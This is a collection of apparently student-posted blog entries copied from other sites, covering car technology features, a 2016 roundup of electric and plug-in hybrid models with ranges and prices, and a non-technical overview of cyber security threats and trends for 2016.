    • Luggage Compartment 12v Socket
    • LED Foot-well Illumination
    • Three Digit MPG Display
    • Steering Wheel Heater
    • New Mitsubishi Multi Communication System
    • 360 Camera with Steering Wheel Switch
    • Super Wide Range LED Headlamps with Auto-levelling
    • Front & Rear Parking Sensors
    • Unintended Acceleration Mitigation System (UMS)
  2. Toyota Yaris

Yaris is a very clever car. A no fuss world that’s big on convenience.

Audio System

Yaris models feature a 6.1″ Touchscreen Audio Display with USB connectivity[G5] for iPods®[G8] and MP3 players plusBluetooth®[B5] functions for added flexibility.

ZR Hatch & all Sedan grades feature Voice Recognition technology to help you stay focused on the road ahead. Both the ZR Hatch and YRX Sedan also feature Satellite Navigation

Satellite Navigation (Sat Nav)

Satellite Navigation (Sat Nav)<sup>[N1]</sup>

Sat Nav or Satellite Navigation is a system which displays the location of the vehicle on a “map” screen, and can be programmed to provide information such as directions to a destination both visually, and with spoken messages. Image shown for illustration purposes only. Specification may vary across models  with 3D graphics and SUNA™Traffic Updates and Toyota Link

yaris zr sports premium steering wheel 940x529

Steering wheel controls

Throughout the Yaris hatch range, steering wheel controls give you fingertip control of audio. So you don’t even need to take your hands off the wheel.

You know where you are with Yaris

The ZR hatch and YRX sedan models are fitted with Sat Nav[N1] which includes a traffic avoidance system[G7], which can help you keep clear of traffic congestion.

Open sesame. Keyless entry system

All Yaris grades come with remote central locking. So when it’s pouring with rain or you have a load of shopping or luggage to unload, there’s no need to fumble with your keys in the door when you park or load up.

3. Volkswagen Golf GTE

Composition Media

With a raft of features, from Intuitive HMI, Touchscreen, CD Drive, Bluetooth telephony, front and rear speakers and more, Compostion Media delivers something for everyone.

Discover Media

The optional Discover Media provides the best of both entertainment and driver assistance. The impressive Map Navigation feature provides 3 calculated routes, a driver can always choose between the fastest, the shortest or the most eco-friendly way. With a 5.8″ touchscreen capacitive colour display in QVGA.

Air conditioning, 2Zone Climatronic

Climatronic air conditioning with 2-zone temperature control lets you set two different temperature zones in your car – for both the driver and front passenger seats. So you can both adjust your air conditioned environment to be just the way you like it.

Advanced telephone connection

The optional advanced telephone connection gives you all the benefits of in car communication with an improved connection for your phone and the convenience of an integrated holder with charging function.

Multi Device Interface

You can choose a personal soundtrack to your drive with the Multi-Device Interface. Tucked away neatly and securely, it offers you a fast and easy link to files on your MP3 player, iPod and USB memory stick.

Ambient lighting

The dashboard, doors and footwell are illuminated by the optional ambient lighting creating a pleasant atmosphere. The pack also includes LED reading lights.

Adjustable Steering Column

The steering column can be fully adjusted to suit your individual driving requirements with the length and height adjustment newly redesigned.

Driver Alert System

The Driver Alert system analyses driver behaviour and gives both visual and audible warnings with advice to take a break.

4. Toyota Prius
prius i tech hero 940x529

Iconic styling

Innovation comes in many forms, but never has it been as elegant and refined as the latest generation Prius.

features superior hybrid synergy drive technology 940x529

Hybrid Performance

With Prius you can enjoy efficiency without sacrificing power. The 4th Generation Hybrid Synergy Drive® delivers remarkable fuel efficiency without compromising performance.

features head up display 940x529

Cutting Edge Technology

Every Prius is packed with the latest intelligent technology. Each innovation has been developed to make driving easier, smoother and more intuitive. All are a result of clever thinking that strives to deliver an enhanced driving experience, in all driving conditions.

features intelligent parking assist 300x169

Car Safety

Wherever you travel, whether it’s out on the open road or zipping about city streets, it’s reassuring to know when you get behind the wheel of Prius, you’re protected by some of the most advanced safety features and technology ever developed.

 

Posted here by:

FELISCUZO, Rusel II B.

9 Awesome Futuristic Car Concepts

Electric Cars 2016

Audi A3 E-Tron

Plug-in Hybrid Luxury

16 miles (electric + gasoline)
$37,900

After years of developing all kinds of plug-in prototype, Audi put one on sale in January 2016. The A3 Sportback platform has a compelling mix of attributes—elegant lines, high-quality materials and practicality. Combine that with a capable 1.4-liter turbocharged gas engine and an electric powertrain providing about 16 miles of electric driving. The result is a small snazzy and robust plug-in hybrid.

BMW 330e

Plug-in Hybrid Sedan

14 miles (electric + gasoline)
$43,700

If you like the styling and road manners of a BMW 3-Series, but want to push the envelope on efficiency, then the 330e is the answer. Commutes of less than 14 miles can happen purely on electricity, with an official 72 MPGe rating. Punch the accelerator for combined power from a 2-liter turbocharged engine and 87-hp electric motor. That results in nearly as much torque as the V6 340i at a lower purchase price after federal incentives.

BMW i3

Electric Vehicle Sedan

81 miles (pure electric)
$43,300

The stylish if slightly odd-looking BMW i3 is the lightest EV on the market. That makes it very efficient while providing a fast and fun 170-horsepower ride. The i3’s battery pack delivers more than 80 miles of range. The electric Bimmer is also available with a small gas engine that essentially doubles that distance.

BMW i8

Plug-in Hybrid Coupe

25 miles (electric + gasoline)
$137,000

The i8 is BMW’s expensive sleek futuristic plug-in hybrid supercar. The car is powered in a one-two punch by a powerful 96-kilowatt (129-horsepower) electric motor driving the front wheels—and an efficient 230-horsepower 1.5-liter turbocharged three-cylinder gasoline engine motivating the rear wheels. The car has a delightful split personality: switching on command between virtuous EV silence, and a delightful Porsche-like engine note when driven as a sports machine.

BMW X5 xdrive40e

Plug-in Hybrid SUV

13 miles (electric + gasoline)
$64,000

The X5 is everything you’d expect from a BMW. High quality materials abound inside the vehicle’s refined cabin. A turbocharged 2.0-liter engine and 111-horsepower electric motor provide a solid 308 horsepower and 332 pound-feet of torque. With the ability to plug in, X5 xDrive 40e grants 13 miles in electric-only mode, and 24 mpg strictly from the gas engine.

Cadillac ELR

Plug-in Hybrid Coupe

37 miles (electric + gasoline)
$76,000

The ELR boasts an electric-only range of 37 miles and a total combined range of about 340 miles. The ELR shares most of its technical elements with the current Chevy Volt, including its 1.4-liter gasoline engine and 17-kWh lithium-ion battery pack. The ELR features Cadillac’s signature angular look, but that alone is not worth the steep price.

Chevrolet Spark EV

Electric Vehicle Coupe

82 miles (pure electric)
$26,000

The Spark EV is the all-electric version of Chevy’s five-door urban mini-car. The powerful motor, quick acceleration, and short wheelbase, make it an exhilarating drive. At an estimated 119 MPGe, it’s one of the most efficient electric car on sale today.

Chevy Volt

Plug-in Hybrid Sedan

53 miles (electric + gasoline)
$34,000

The 2016 Chevy Volt ushers in the second generation of the world’s most popular plug-in hybrid. While the first-generation model was designed to attract early adopters, the 2016 edition expands the Volt’s market reach to a broader segment of car buyers. It has more all-electric range; it’s faster; and its design is more pleasant.

Fiat 500e

Electric Vehicle Coupe

84 miles (pure electric)
$32,600

The Fiat 500e is every bit as cute as the gas-powered Fiat 500. It uses a 24 kilowatt-hour liquid-cooled lithium-ion battery pack, providing an official EPA range of 84 miles. The Fiat 500e is widely considered a “compliance” car produced only in small numbers to meet California regulations.

Ford C-Max Energi

Plug-in Hybrid Wagon/Van

19 miles (electric + gasoline)
$32,600

The Ford C-Max Energi is a compelling alternative to the other leading plug-in hybrids—the Chevy Volt and Plug-in Prius. It offers 19 miles of all-electric driving, 620 miles of total range, and an attractive price. The C-Max is considered a small “activity” vehicle, which is popular in Europe but not widely available in the United States. The small wagon-like platform is versatile and functional.

Ford Focus Electric

Electric Vehicle Sedan

76 miles (pure electric)
$29,200

The five-door hatchback provides about 80 miles of range. It offers many features that make it an enticing EV package, including an attractive design and zippy drive. The Focus Electric employs a 107-kilowatt (143 horsepower) motor, compared to the LEAF’s 110 horsepower motor.

Ford Fusion Energi

Plug-in Hybrid Sedan

19 miles (electric + gasoline)
$33,900

The Ford Fusion Energi offers a robust plug-in electric system in an ultra-popular roomy full-size sedan platform. The model offers the equivalent of about 100 miles per gallon, without compromising style or passenger space. After its battery is depleted, the Fusion Energi still delivers 38 miles per gallon.

Hyundai Sonata Plug-in Hybrid

Plug-in Hybrid Sedan

27 miles (electric + gasoline)
$35,400

Hyundai takes on the plug-in competition with a powerful motor, six-speed automatic transmission, and a battery pack providing about 27 miles of all-electric range. It’s packaged in the attractive and comfortable Sonata mid-size sedan.

Kia Soul EV

Electric Vehicle Sedan

93 miles (pure electric)
$34,500

Hyundai-Kia arrived late to the EV party. But it appears that Kia made a careful study of the competition, and loaded its Soul EV with smart features for electric car drivers. For starters, it offers 93 miles of real-world range.

Mercedes B-Class Electric Drive

Electric Vehicle Sedan

85 miles (pure electric)
$42,400

This small Mercedes electric car directly competes with the BMW i3. Its powertrain is provided by Tesla Motors, but engineers turned it into a comfortable and relaxed commuter car. If driven with care, the well-appointed B-Class could offer around 100 miles of range from a battery pack capable of holding 31.5 kilowatt-hours of juice.

Mercedes C350 Plug-in Hybrid

Plug-in Hybrid Sedan

20 miles (electric + gasoline)
$46,400

The second plug-in hybrid from Mercedes is brought to the small luxury C-Class. It’s both sporty, with total output of 275 horsepower, and capable of about 20 miles of ultra-efficient electric driving. The C350 is stylish, well appointed, and loaded with advanced safety features. The ability to plug in will push the C-Class car to new levels of efficiency.

Mercedes S550 Plug-in Hybrid

Plug-in Hybrid Sedan

20 miles (electric + gasoline)
TBD

It’s hard to find flaws in a Mercedes S-Class. In the past, power and comfort came at some price in terms of fuel efficiency. With the S550 Plug-in Hybrid, you get all the benefits of the Mercedes flagship sedan, but now with 20 miles of all-electric range and (depending on how you drive and charge) as much as 40 miles per gallon.

Mercedes-Benz GLE550e

Plug-in Hybrid SUV

12 miles (electric + gasoline)
$67,000

The Mercedes-Benz GLE550e 4Matic brings the plug-in hybrid system of the S550 large sedan—which has been available in the United States since 2015—to the brand’s largest crossover SUV model: the GLE. With an all-electric range of about 12 miles, the GLE isn’t going to revolutionize the market. Yet, it provides another option for shoppers looking for a large luxury plug-in hybrid crossover.

Mitsubishi i-MiEV

Electric Vehicle Sedan

62 miles (pure electric)
$23,800

The Mitsubishi i-MiEV was once considered a front-runner in the race for a mass-market EV. The cute car claims a max speed of 80 mph and a range of about 75 miles. But with the i-MiEV’s small size and modest electric drivetrain, and limited production numbers, it has become more of an also-ran.

Nissan LEAF

Electric Vehicle Sedan

107 miles (pure electric)
$29,000

The Nissan LEAF is by far the most popular EV in the world. It is a well-equipped, all-electric hatchback that seats five adults and can travel up to 107 miles on a single charge. The LEAF is available to test-drive and purchase at Nissan dealerships throughout the United States.

Porsche Cayenne S E-Hybrid

Plug-in Hybrid SUV

14 miles (electric + gasoline)
$78,000

The Cayenne S E-Hybrid is the first luxury plug-in SUV to hit the market. It combines the stylish lines and sporty performance of a Porsche in the form of its popular crossover. Now add a 10.8 kilowatt-hour battery, which means about 14 miles of all-electric driving, and total average EPA efficiency of 47 MPGe.

Porsche Panamera S E-Hybrid

Plug-in Hybrid Sedan

16 miles (electric + gasoline)
$93,000

The Porsche Panamera S E-hybrid is luxury sports sedan first, and a plug-in hybrid second. The four-seater is powered by a 3.0-liter, V6 supercharged gasoline engine, paired with a 70-kilowatt electric motor. It provides about 22 miles of all-electric range and a top speed of 167 miles per hour.

Smart Electric Drive

Electric Vehicle Coupe

68 miles (pure electric)
$25,000

The latest version of tiny two-seat city car is a vast improvement over Smart’s previous all-electric versions. Measuring just over 106 inches from tip to tail, and a shade under 62 inches tall and wide, the Smart ForTwo Electric Drive is small enough to occupy the smallest of spaces. And it’s the only EV available with a convertible top.

Tesla Model S

Electric Vehicle Sedan

315 miles (pure electric)
$71,000

The Tesla Model S is a bright vision of a practical and desirable all-electric sedan. Tesla set a big goal for itself: to deliver not just a great EV, but one of the world’s best luxury sedans. Mission accomplished.

Tesla Model X

Electric Vehicle SUV

289 miles (pure electric)
$80,000

The Model X is Tesla’s follow-up vehicle to the award-winning Model S sedan. The X shares about 60 percent of the content from the sedan—converting the sleek Maserati-looking five-passenger model into a stylish crossover utility vehicle.

Volkswagen E-Golf

Electric Vehicle Sedan

83 miles (pure electric)
$29,800

The Volkswagen E-Golf is the company’s first all-electric car. It maintains the spirited driving experience of internal combustion versions of the Golf—one of the most popular small cars in the world. The VW E-Golf is arguably the best handling car among the emerging class of small affordable EVs.

Volvo XC90 T8

Plug-in Hybrid SUV

17 miles (electric + gasoline)
$69,000

The Volvo XC90 T8 is a luxury high-performance plug-in hybrid SUV. It offers comfort, safety, and a level of efficiency previously thought impossible in a all-wheel-drive people-mover. It’s expected to offer about 17 miles of all-electric range, and the equivalent total fuel economy of 59 miles per gallon.

Chevrolet Bolt

Electric Vehicle Sedan

238 miles (pure electric)
$37,500

With the Bolt, General Motors will be the first to offer an affordable long-range electric car, rated to provide 238 miles on a single charge. It’s due before the end of 2016.

Toyota Prius Plug-in Hybrid (Prime)

Plug-in Hybrid Sedan

22 miles (electric + gasoline)
TBD

The 2017 Toyota Prius Prime replaces the Prius Plug-in Hybrid, which Toyota ceased producing in June 2015. The Prius Prime is expected to achieve an EV-only range of 22 miles thanks to its 8.8-kWh lithium ion battery pack—which doubles the capacity of the former 4.4-kWh pack.

Chrysler Pacifica Plug-in Hybrid

Plug-in Hybrid Wagon/Van

30 miles (electric + gasoline)
TBD

Chrysler unveiled the all-new 2017 Pacifica Plug-in Hybrid at the 2016 Detroit auto show. It is Chrysler’s first plug-in car—and the industry’s first plug-in hybrid minivan. With the rise of crossover SUVs, and the stodgy image of bloated family-haulers, the minivan market has shrunk in the past decade or so. Perhaps Chrysler’s plug-in hybrid, offering 30 miles of all-electric range, will lure families back into the segment.

Tesla Model 3

Electric Vehicle Sedan

200 miles (pure electric)
$35,000

Tesla would have to defy all expectations to achieve success on the Model 3, while avoiding all the potential pitfalls—not only for the 200-mile $35,000 Model 3, but a massive new battery factory. Yet, based on the unveiling of the car in March 2016, the company appears ready to make another ground-breaking electric car.

Porsche 918 Spyder

Plug-in Hybrid Coupe

12 miles (electric + gasoline)
$845,000

The Porsche 918 Spyder is a plug-in hybrid supercar, produced in a limited quantity of 918. Porsche makes plug-in hybrid versions of the Panamera and Cayenne. But ultra-expensive 887-horsepower 918 Spyder is in the echelon of the McLaren P1 and LaFerrari. The 918 pays homage to iconic sports cars like Porsche’s Carrera GT and 959.

McLaren P1

Plug-in Hybrid Coupe

19 miles (electric + gasoline)
$1,150,000

The McLaren P1 is a limited-run British plug-in hybrid sportscar. It’s considered one of the most exciting road cars ever built. The $1.15 million P1’s 3.8-liter 727-hp V-8 is paired with a 177-hp electric motor to unleash a mind-boggling 903-horsepower, revealing that plug-in hybrid technology can be applied to the highest end of supercar performance.

 

Source: http://www.plugincars.com/cars

Posted By: Cristina O. Libuna

Judems Daub

 

CYBER SECURITY, CYBER CRIMINAL, AND TOP CYBER SECURITY TRENDS

What is Cyber Security?

While rapid technological developments have provided vast areas of new opportunity and potential sources of efficiency for organisations of all sizes, these new technologies have also brought unprecedented threats with them. Cyber security – defined as the protection of systems, networks and data in cyberspace – is a critical issue for all businesses. Cyber security will only become more important as more devices, ‘the internet of things’, become connected to the internet.

Introduction to cyber criminals

Cyberspace is unregulated and cyber crime is increasingly simple and cheap to commit: the Fortinet 2013 Cybercrime Report found that an effective botnet – a network of private computers infected with malicious software and controlled without the owners’ knowledge – can be established for as little as $700 (about £420), or can be rented for just $535 (about £320) per week. Cyber criminals can now even buy off-the-shelf hacking software, complete with support services.

Congruent with the rapid pace of technological change, the world of cyber crime never stops innovating either. Every month, Microsoft publishes a bulletin of the vulnerabilities of its systems, an ever-growing list of known threats, bugs and viruses. For a more complete overview of cyber security threats, mailing lists such as Bugtraq can provide up-to-date resources listing all new bugs.

Types of malware

Cyber criminals operate remotely, in what is called ‘automation at a distance’, using numerous means of attack available, which broadly fall under the umbrella term of malware (malicious software). These include:

  • Viruses
    Aim: Gain access to, steal, modify and/or corrupt information and files from a targeted computer system.
    Technique: A small piece of software program that can replicate itself and spread from one computer to another by attaching itself to another computer file.
  • Worms
    Aim: By exploiting weaknesses in operating systems, worms seek to damage networks and often deliver payloads which allow remote control of the infected computer.
    Technique: Worms are self-replicating and do not require a program to attach themselves to. Worms continually look for vulnerabilities and report back to the worm author when weaknesses are discovered.
  • Spyware/Adware
    Aim: To take control of your computer and/or to collect personal information without your knowledge.
    Technique: By opening attachments, clicking links or downloading infected software, spyware/adware is installed on your computer.
  • Trojans
    Aim: To create a ‘backdoor’ on your computer by which information can be stolen and damage caused.
    Technique: A software program appears to perform one function (for example, virus removal) but actually acts as something else.

Attack vectors

There are also a number of attack vectors available to cyber criminals which allow them to infect computers with malware or to harvest stolen data:

  • Phishing
    An attempt to acquire users’ information by masquerading as a legitimate entity. Examples include spoof emails and websites. See ‘social engineering’ below.
  • Pharming
    An attack to redirect a website’s traffic to a different, fake website, where the individuals’ information is then compromised. See ‘social engineering’ below.
  • Drive-by
    Opportunistic attacks against specific weaknesses within a system.
  • MITM
    ‘Man in the middle attack’ where a middleman impersonates each endpoint and is thus able to manipulate both victims.
  • Social engineering
    Exploiting the weakness of the individual by making them click malicious links, or by physically gaining access to a computer through deception. Pharming and phishing are examples of social engineering.

    5 cybersecurity trends to watch for 2016

    Here are five major trends in cybersecurity that you should have in mind when updating your InfoSec plans for 2016.

    Cloud services

    As more and more of the services we use reside in the cloud, IT departments can lose oversight and control. Employees are bypassing IT to snag the services they feel they need, and there’s a real danger that they’re bypassing security protocols and systems in the process. You should take steps to ensure that your IT department has full visibility.

    Even approved cloud vendors must be scrutinized on an ongoing basis. Do you know where your data resides? Do your cloud service providers meet your security standards? If they aren’t in compliance, their failure to meet regulatory requirements could be something that you’re liable for. Don’t take it on trust, test your third-party vendors and verify for yourself.

    Ransomware

    The impact of ransomware is growing. According to the Cyber Threat Alliance, the recent CyrptoWall v3 threat has cost hundreds of thousands of users worldwide more than $325 million so far. This kind of attack encrypts important files, rendering data inaccessible until you pay the ransom. It often relies upon social engineering techniques to gain a foothold.

    It works, and we expect to see a lot more of it over the next 12 months, because the easiest way for many individuals and businesses to get their data back is just to pay the ransom. With a bit of forethought, better education and real-time security protection, not to mention a regular, robust backup routine, the threat of ransomware can be cut down to size.

    Spear phishing

    Cybercriminals follow the path of least resistance and the easiest way for them to gain access to your precious data is usually by tricking a person into handing over the keys, not by writing a clever piece of code. Phishing attacks are growing more sophisticated all the time, as official-looking messages and websites, or communications that apparently come from trusted sources, are employed to gain access to your systems.

    The targeting of high-level execs or anyone with a high security clearance is on the rise. If cybercriminals can hack a CEO’s account, for example, they can use it to wreak havoc and expose a lot of sensitive data. Educating potential targets about the dangers is not enough. You need a combination of real-time monitoring and scanning systems, with protective blocking capabilities. That said, sometimes laying down a security policy for employee education is all you need.

    Known vulnerabilities

    The open source movement has leveled the playing field for many companies, and there are also lots of off-the-shelf software packages that are very popular. Integrating this software will often make more business sense than developing something in-house, but you have to keep vulnerabilities in mind. Publicly known vulnerabilities are one of the biggest threats for IT departments.

    Consider that HP’s 2015 Cyber Risk Report found that 44% of 2014 breaches came from vulnerabilities that are two to four years old, and you can see the problem. Software must be patched regularly, and expertise is required to avoid common misconfigurations that offer attackers an easy way in.

    The Internet of Things

    We’ve seen a wave of mobile devices and wearables stream into the workplace, each offering a new potential inroad for a cybercriminal, but the Internet of Things represents another looming threat. As connectivity spreads into every corner of our lives and businesses, it becomes more and more challenging to maintain a clear view of entry points and data flow.

    The IoT may herald some exciting business opportunities, but we must be mindful about ensuring that access is limited and secure. Sensitive data should be encrypted, access must be restricted, and oversight is needed. It’s important to be able to manage and block access to enterprise devices and networks when necessary.

    If you expect to enjoy success in 2016, and you want to ensure that your plans aren’t derailed, then make sure that these cybersecurity trends are on your radar.

    The opinions expressed in this Blog are those of Michelle Drolet and do not necessarily represent those of the IDG Communications, Inc., its parent, subsidiary or affiliated companies.

    Source: http://www.networkworld.com/article/3019235/security/5-cybersecurity-trends-to-watch-for-2016.html

  • http://www.itgovernance.co.uk/what-is-cybersecurity.aspx
  • Posted by : Edna Mae Buniel